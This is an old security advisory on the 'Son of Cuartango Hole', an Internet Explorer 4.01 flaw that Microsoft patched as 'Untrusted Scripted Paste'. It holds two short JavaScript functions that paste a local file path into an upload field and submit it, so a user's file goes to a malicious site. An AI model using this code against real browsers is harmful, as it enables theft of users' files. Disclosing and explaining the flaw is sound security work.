The Son of Cuartango Hole
http://pages.whowhere.com/computers/cuartangojc/son1.html
Affected software
Microsoft Internet Explorer 4.01
Fixes
Microsoft has released a fix : Microsoft Security Site
http://www.microsoft.com/security/bulletins/ms98-015.asp
Microsoft names the vulnerability as "Untrusted Scripted Paste".
They have created a new USP patch.
Technical description
There is an input form field used to tranfer files from the browsing computer to a WEB site this
input field is HTML coded as :
Theoretically this input field can be filled only by the user by clicking a "Browse" button or
typing the file name.
In order to avoid a security hole, script files are not allowed to modify the value of this
input field, the sentence bellow will not work :
document.forms[0].filename = "C:\config.sys";
The Cuartango Hole revealed that a single scripted "copy and paste" operation could write a file
name on the input field, Microsoft's old USP patch fixed this single "copy and paste"
vulnerability.
There is a workaround making the "paste" operation work again. The idea is : create a "textrange"
object with the selection of the file input and then paste over this "textrange" object.
The code below is a bit more sophisticated than the "Cuartango Hole" code :
T1 is a hidden input field defined in a second form containing the file pathname to be copied to
the clipboard.
function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
var rng = document.selection.createRange();
rng.execCommand("paste");
document.forms[0].submit();
}
The result is that the file is POSTED to the malicious WEB site defined in the form action
property.
A similar code will also work inside an HTML formatted e-mail.
The Cuartango Hole code was very similar :
function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
document.forms[0].submit();
}
Example Exploit
Son of Cuartango Hole Test